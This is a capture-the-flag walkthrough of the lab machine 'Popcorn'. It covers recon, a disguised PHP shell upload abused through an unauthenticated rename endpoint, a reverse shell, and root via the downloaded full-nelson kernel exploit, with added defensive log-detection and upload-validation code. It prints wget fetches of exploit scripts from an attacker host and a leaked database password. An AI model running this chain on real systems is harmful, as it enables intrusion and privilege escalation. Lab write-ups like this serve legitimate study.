Popcorn

Introduction:
Recon
# nmap -sS -sV -sC -Pn -T4 -oN popcorn.nmap.txt 10.10.10.6
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-16 19:58 EST
Nmap scan report for 10.10.10.6
Host is up (0.024s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.80 seconds

------------------------------------------------------------
Enter your target IP address or URL here: 10.10.10.6
------------------------------------------------------------
Scanning target 10.10.10.6
Time started: 2020-12-16 19:58:42.274228
------------------------------------------------------------
Port 22 is open
Port 80 is open
Port scan completed in 0:00:33.653293
Enumeration
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.6 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url:            http://10.10.10.6
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
2020/12/16 23:16:40 Starting gobuster
/index (Status: 200)
/test (Status: 200)
/test.php (Status: 200)
/torrent (Status: 301)
/rename (Status: 301)
[ERROR] 2020/12/16 23:25:05 [!] Get http://10.10.10.6/server-status: net/http: request canceled (Client.Timeout exceeded while awaiting headers)

/test.php reports: PHP Version 5.2.10-2ubuntu6.10
/rename documents its interface, with no authentication in front of it:
Renamer API Syntax: index.php?filename=old_file_path_an_name&newfilename=new_file_path_and_name
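The Renamer API found above takes an arbitrary source path and an arbitrary destination path, which is what the rest of this writeup leans on. From the defender's side the same requests are easy to pick out of the Apache access log. The detector below is an added example, not part of the original writeup or of the torrent-hoster application; the log lines are constructed, and the upload directory path and the /rename/ prefix are assumptions taken from the URLs used on this box.

```python
"""Hunting for abuse of the Renamer API in Apache access logs.

Added example for this writeup, not code from the original post or from the
torrent-hoster application. The log lines are constructed; the upload
directory path and the /rename/ prefix are assumptions taken from the URLs
used on this box.
"""
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines: a benign visit, a rename that turns
# an image into a .php file, a benign rename, and a rename whose source path
# lies outside the upload directory.
SAMPLE_LOG = """\
10.10.14.25 - - [16/Dec/2020:23:25:05 -0500] "GET /rename/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.25 - - [16/Dec/2020:23:30:12 -0500] "GET /rename/index.php?filename=/var/www/torrent/upload/abc.png&newfilename=/var/www/torrent/upload/abc.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.10.14.25 - - [16/Dec/2020:23:31:02 -0500] "GET /rename/index.php?filename=/var/www/torrent/upload/abc.txt&newfilename=/var/www/torrent/upload/abc2.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.10.14.25 - - [16/Dec/2020:23:32:40 -0500] "GET /rename/index.php?filename=/etc/passwd&newfilename=/var/www/torrent/upload/p.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

UPLOAD_DIR = "/var/www/torrent/upload/"   # assumed: the only tree renames should touch
EXECUTABLE_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}


def classify_rename(request_path):
    """Return the reasons a /rename/ request looks malicious (empty list if benign)."""
    parts = urlsplit(request_path)
    if not parts.path.startswith("/rename/"):
        return []
    qs = parse_qs(parts.query)          # parse_qs percent-decodes the values
    src = qs.get("filename", [""])[0]
    dst = qs.get("newfilename", [""])[0]
    if not src or not dst:
        return []
    # normpath collapses "../", so traversal that starts inside the upload dir is caught too
    src_norm = posixpath.normpath(src)
    dst_norm = posixpath.normpath(dst)
    reasons = []
    if not src_norm.startswith(UPLOAD_DIR):
        reasons.append("source_outside_upload_dir")
    if not dst_norm.startswith(UPLOAD_DIR):
        reasons.append("dest_outside_upload_dir")
    if posixpath.splitext(dst_norm)[1].lower() in EXECUTABLE_EXTS:
        reasons.append("executable_destination")
    return reasons


def find_suspicious(log_text):
    """Parse each access-log line and keep the ones classify_rename flags."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_rename(m.group("path"))
        if reasons:
            hits.append((m.group("ip"), m.group("ts"), m.group("path"), reasons))
    return hits


if __name__ == "__main__":
    for ip, ts, path, reasons in find_suspicious(SAMPLE_LOG):
        print(f"{ts} {ip} {', '.join(reasons)}: {path}")
```

Run against the constructed sample it flags two of the four requests: the .png to .php rename and the one whose source is /etc/passwd. The same three checks (source in the upload tree, destination in the upload tree, destination not executable) are exactly what the endpoint itself should be enforcing; logging them is the fallback when the application does not.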
Exploitation
$ hexeditor shell.png -b
http://10.10.10.6/rename/index.php?filename=/var/www/torrent/upload/723bc28f9b6f924cca68ccdff96b6190566ca6b4.png&newfilename=/var/www/torrent/upload/723bc28f9b6f924cca68ccdff96b6190566ca6b4.php
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.6] 49744
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 05:18:21 up 54 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash");'
www-data@popcorn:/$ whoami
whoami
www-data
www-data@popcorn:/$
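The chain above works for two reasons: the upload check stops at the PNG signature that hexeditor can prepend to anything, and the rename endpoint accepts any path and any new extension. The following is an added example, not code from the writeup or from the torrent-hoster application (which is PHP; the checks are shown in Python), illustrating the two server-side controls that close it: parsing the PNG chunk structure instead of trusting the first eight bytes, and confining renames to bare filenames inside the upload directory with no change of extension. All paths and sample bytes are constructed.

```python
"""Server-side controls that break the upload-then-rename chain.

Added example for this writeup, written in Python rather than the PHP of the
torrent-hoster application; it is not the application's own code. Inputs are
constructed: a minimal real PNG, and a script body with a PNG header glued on.
"""
import os
import struct
import tempfile
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
EXECUTABLE_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}


def has_png_magic(data):
    """Weak check: only the first eight bytes are inspected."""
    return data.startswith(PNG_SIGNATURE)


def is_valid_png(data):
    """Strict check: walk the chunk list, verify every CRC, require IHDR first
    and IEND last with no trailing bytes. A script with a PNG header glued on
    fails at the first chunk."""
    if not data.startswith(PNG_SIGNATURE):
        return False
    pos, first = len(PNG_SIGNATURE), True
    while pos + 12 <= len(data):               # length(4) + type(4) + crc(4)
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            return False
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            return False
        if first and (ctype != b"IHDR" or length != 13):
            return False
        first, pos = False, end
        if ctype == b"IEND":
            return pos == len(data)
    return False


def _chunk(ctype, body):
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_minimal_png():
    """Constructed 1x1 greyscale PNG used as the 'real image' sample."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")          # filter byte + one pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def safe_rename(upload_dir, old_name, new_name):
    """Rename within upload_dir only. Raises ValueError rather than touch a path
    outside the directory, change the extension, or create an executable file."""
    root = os.path.realpath(upload_dir)
    src = os.path.realpath(os.path.join(root, old_name))
    dst = os.path.realpath(os.path.join(root, new_name))
    if os.path.dirname(src) != root or os.path.dirname(dst) != root:
        raise ValueError("path escapes upload directory")
    src_ext, dst_ext = (os.path.splitext(p)[1].lower() for p in (src, dst))
    if dst_ext in EXECUTABLE_EXTS:
        raise ValueError("executable extension not allowed")
    if dst_ext != src_ext:
        raise ValueError("extension change not allowed")
    os.rename(src, dst)
    return dst


def demo():
    """Exercise both controls on constructed inputs and return the outcomes."""
    real_png = build_minimal_png()
    disguised = PNG_SIGNATURE + b"<?php echo 'constructed placeholder'; ?>"
    results = {
        "real_magic": has_png_magic(real_png), "real_valid": is_valid_png(real_png),
        "disguised_magic": has_png_magic(disguised), "disguised_valid": is_valid_png(disguised),
    }
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "a.png"), "wb") as f:
            f.write(real_png)
        results["rename_ok"] = os.path.basename(safe_rename(d, "a.png", "b.png"))
        for new_name in ("b.php", "../b.png", "b.txt"):
            try:
                safe_rename(d, "b.png", new_name)
                results[new_name] = "allowed"
            except ValueError as e:
                results[new_name] = "blocked: " + str(e)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The disguised file passes has_png_magic and fails is_valid_png, which is the whole point of parsing the structure rather than sniffing a signature. Even with both controls in place the upload directory should also have script execution disabled in the web server configuration, so that a file which slips through is still served as data rather than run.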
Post-exploit/PrivEsc
www-data@popcorn:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
landscape:x:102:105::/var/lib/landscape:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
george:x:1000:1000:George Papagiannopoulos,,,:/home/george:/bin/bash
mysql:x:104:113:MySQL Server,,,:/var/lib/mysql:/bin/false

bash: cd: HOME not set
www-data@popcorn:/$ ls
ls
bin    dev   initrd.img  media  proc     selinux  tmp  vmlinuz
boot   etc   lib         mnt    root     srv      usr
cdrom  home  lost+found  opt    sbin     sys      var
www-data@popcorn:/$ cd /home/
cd /home/
www-data@popcorn:/home$ ls
ls
george
www-data@popcorn:/home$ cd george
cd george
www-data@popcorn:/home/george$ ls
ls
torrenthoster.zip  user.txt
www-data@popcorn:/home/george$ cat user.txt
cat user.txt
68000ffd4f2e970895848c96db8d2b5c
www-data@popcorn:/home/george$
Download Linpeas
www-data@popcorn:/tmp$ wget http://10.10.14.25:8000/linpeas.sh
wget http://10.10.14.25:8000/linpeas.sh
--2020-12-18 05:25:11--  http://10.10.14.25:8000/linpeas.sh
Connecting to 10.10.14.25:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 300193 (293K) [text/x-sh]
Saving to: `linpeas.sh'

100%[======================================>] 300,193     --.-K/s   in 0.09s

2020-12-18 05:25:11 (3.34 MB/s) - `linpeas.sh' saved [300193/300193]

www-data@popcorn:/tmp$ chmod 755 linpeas.sh
chmod 755 linpeas.sh
www-data@popcorn:/tmp$ ./linpeas.sh
./linpeas.sh
Findings
$CFG->host = "localhost";
$CFG->dbName = "torrenthoster"; //db name
$CFG->dbUserName = "torrent"; //db username
$CFG->dbPassword = "SuperSecret!!"; //db password

[+] Files inside others home (limit 20)
/home/george/.bash_logout
/home/george/.bashrc
/home/george/torrenthoster.zip
/home/george/.cache/motd.legal-displayed
/home/george/.sudo_as_admin_successful
/home/george/user.txt
/home/george/.nano_history
/home/george/.mysql_history
/home/george/.profile

-rw-r--r-- 1 george george 3180 Mar 17  2017 /home/george/.bashrc
-rw-r--r-- 1 george george  675 Mar 17  2017 /home/george/.profile

-rw-r--r-- 1 root root 0 Mar 17  2017 /etc/apache2/httpd.conf

-rwsr-xr-x 2 root root 121K Jun 22  2009 /usr/bin/sudoedit  --->  Sudo/SudoEdit_1.6.9p21/1.7.2p4/(RHEL_5/6/7/Ubuntu)/Sudo<=1.8.14
www-data@popcorn:/tmp$ wget http://10.10.14.25:8000/les.sh
wget http://10.10.14.25:8000/les.sh
--2020-12-18 05:55:54--  http://10.10.14.25:8000/les.sh
Connecting to 10.10.14.25:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 85113 (83K) [text/x-sh]
Saving to: `les.sh'

100%[======================================>] 85,113      --.-K/s   in 0.05s

2020-12-18 05:55:54 (1.79 MB/s) - `les.sh' saved [85113/85113]

www-data@popcorn:/tmp$ chmod 755 les.sh
chmod 755 les.sh
www-data@popcorn:/tmp$ ./les.sh
./les.sh
Available information:

Kernel version: 2.6.31
Architecture: i686
Distribution: ubuntu
Distribution version: 9.10
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

74 kernel space exploits
45 user space exploits

Possible Exploits:

[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson

   Details: http://vulnfactory.org/exploits/full-nelson.c
   Exposure: highly probable
   Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
   Download URL: http://vulnfactory.org/exploits/full-nelson.c
www-data@popcorn:/tmp$ wget http://10.10.10.6:8000/nelson.c
wget http://10.10.10.6:8000/nelson.c
--2020-12-18 05:59:35--  http://10.10.10.6:8000/nelson.c
Connecting to 10.10.10.6:8000... failed: Connection refused.
www-data@popcorn:/tmp$ http://10.10.14.25:8000/nelson.c
http://10.10.14.25:8000/nelson.c
bash: http://10.10.14.25:8000/nelson.c: No such file or directory
www-data@popcorn:/tmp$ wget http://10.10.14.25:8000/nelson.c
wget http://10.10.14.25:8000/nelson.c
--2020-12-18 05:59:57--  http://10.10.14.25:8000/nelson.c
Connecting to 10.10.14.25:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9487 (9.3K) [text/plain]
Saving to: `nelson.c'

100%[======================================>] 9,487       --.-K/s   in 0.01s

2020-12-18 05:59:57 (655 KB/s) - `nelson.c' saved [9487/9487]

www-data@popcorn:/tmp$ gcc nelson.c -o full-nelson
gcc nelson.c -o full-nelson
www-data@popcorn:/tmp$ ./full-nelson
./full-nelson
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf8414280
[+] Resolved econet_ops to 0xf8414360
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
cd /root
cd /root
ls
ls
root.txt
cat root.txt
cat root.txt
eb82XXXXXXXXXXXXXXXXXXXX6890
Notes: